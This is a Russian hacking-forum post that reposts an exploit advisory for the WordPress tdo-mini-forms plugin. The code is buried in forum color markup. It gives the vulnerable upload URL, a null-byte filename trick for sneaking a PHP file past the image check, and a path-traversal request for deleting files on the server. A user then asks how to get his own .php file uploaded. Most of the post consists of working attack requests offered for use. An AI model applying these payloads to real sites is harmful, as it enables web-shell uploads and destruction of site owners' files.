22.11.2012, 02:26
|
|
Новичок
Регистрация: 01.12.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Wordpress Plugin tdo-mini-forms (rfu/rfd) Vulnerabilities
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]wordpress tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms plugin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rfu[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]rfd[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Vulnerabilities
[/COLOR][COLOR="#007700"]------------------------------------------------------------
[/COLOR][COLOR="#0000BB"]wordpress tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms plugin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]remote file upload[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]remote file deletion[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]Vulnerabilities
Auther[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Cold z3ro[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]hackteach[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]org[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]s3curi7y[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
Anonymous[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]You are the man
[/COLOR][COLOR="#FF8000"]# Remote file upload :
[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]upload[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]inline[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#0000BB"]file extension[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg
uploaded path[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]$tdomf_form_id[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]$user_agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]IP[/COLOR][COLOR="#007700"])/[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg
Example to uploaded path[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]wordpress[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg
[/COLOR][COLOR="#FF8000"]# Remote file Deletion
[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]Note[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]useing Any http POST header modifier[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]deletefile[/COLOR][COLOR="#007700"][] =[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]filepath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$varibale[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]NULL
Example to result[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]plugins[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdo[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mini[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]upload[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]inline[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]tdomf_form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]deletefile[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]filepath[/COLOR][COLOR="#007700"]=../../../[/COLOR][COLOR="#0000BB"]wp[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]uploads[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tdomf[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tmp[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]127.0.0.1[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]z3ro[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PHP[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"];.[/COLOR][COLOR="#0000BB"]jpg[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]=
[/COLOR][COLOR="#0000BB"]Eof[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]# 1337day.com/exploit/19776 [2012-11-21]
[/COLOR][/COLOR]
Кто нибудь скажет как заставить этот плагин залить мой файл в формате .php?
|
|
|